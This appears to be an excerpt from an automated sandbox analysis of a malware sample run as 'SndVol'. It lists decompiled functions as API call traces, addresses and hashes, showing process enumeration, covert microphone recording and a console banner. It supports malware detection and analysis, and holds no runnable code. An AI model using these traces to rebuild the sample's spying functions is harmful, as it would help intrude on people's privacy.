                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                APIs
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered
                                                                • API String ID: 614609389-2816303416
                                                                • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                APIs
                                                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                • _free.LIBCMT ref: 00444E06
                                                                • _free.LIBCMT ref: 00444E1D
                                                                • _free.LIBCMT ref: 00444E3C
                                                                • _free.LIBCMT ref: 00444E57
                                                                • _free.LIBCMT ref: 00444E6E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3033488037-0
                                                                • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                • _free.LIBCMT ref: 004493BD
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 00449589
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                APIs
                                                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2180151492-0
                                                                • Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                • Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                APIs
                                                                  • Part of subcall function 0536CC84: GetCurrentProcess.KERNEL32(00000003,?,?,0536BF9E,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0536CC95
                                                                  • Part of subcall function 0536CC84: IsWow64Process.KERNEL32(00000000,?,?,0536BF9E,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0536CC9C
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 053605E8
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0536060C
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0536061B
                                                                • CloseHandle.KERNEL32(00000000), ref: 053607D2
                                                                  • Part of subcall function 0536CCB2: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,053602C6,00000000,?,?,00475338), ref: 0536CCC7
                                                                  • Part of subcall function 0536CCB2: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0536CCD2
                                                                  • Part of subcall function 0536CEAA: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0536CEC2
                                                                  • Part of subcall function 0536CEAA: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0536CED5
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 053607C3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2180151492-0
                                                                • Opcode ID: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
                                                                • Instruction ID: a625aa35f2dc6df88dfd2525b91b5c2afcf1be4cc32c5190917f48c0b685f01b
                                                                • Opcode Fuzzy Hash: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
                                                                • Instruction Fuzzy Hash: 4A412F356082449BD339FB20DC58EEF73E9BF94350F50992DE88A83195EF305A4AC756
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                • __freea.LIBCMT ref: 0045121D
                                                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                • waveInStart.WINMM ref: 00401CFE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                • String ID:
                                                                • API String ID: 1356121797-0
                                                                • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                • _free.LIBCMT ref: 0044F3BF
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                • _free.LIBCMT ref: 004482D3
                                                                • _free.LIBCMT ref: 004482FA
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                • String ID:
                                                                • API String ID: 2951400881-0
                                                                • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                APIs
                                                                • _free.LIBCMT ref: 004509D4
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 004509E6
                                                                • _free.LIBCMT ref: 004509F8
                                                                • _free.LIBCMT ref: 00450A0A
                                                                • _free.LIBCMT ref: 00450A1C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                APIs
                                                                • _free.LIBCMT ref: 053A16A1
                                                                  • Part of subcall function 0539744F: HeapFree.KERNEL32(00000000,00000000,?,053A193C,?,00000000,?,00000000,?,053A1BE0,?,00000007,?,?,053A212B,?), ref: 05397465
                                                                  • Part of subcall function 0539744F: GetLastError.KERNEL32(?,?,053A193C,?,00000000,?,00000000,?,053A1BE0,?,00000007,?,?,053A212B,?,?), ref: 05397477
                                                                • _free.LIBCMT ref: 053A16B3
                                                                • _free.LIBCMT ref: 053A16C5
                                                                • _free.LIBCMT ref: 053A16D7
                                                                • _free.LIBCMT ref: 053A16E9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: c4ed482aadffc3353693d21aafdebdbf7a7a51cc31b47088e982486656baae32
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: AFF096B36182006BCF24EB58E885D1677EDFA45B10B9C6809F649DB5B0C770F8C0C658
                                                                APIs
                                                                • _free.LIBCMT ref: 00444066
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 00444078
                                                                • _free.LIBCMT ref: 0044408B
                                                                • _free.LIBCMT ref: 0044409C
                                                                • _free.LIBCMT ref: 004440AD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                Strings
                                                                Memory Dump Source
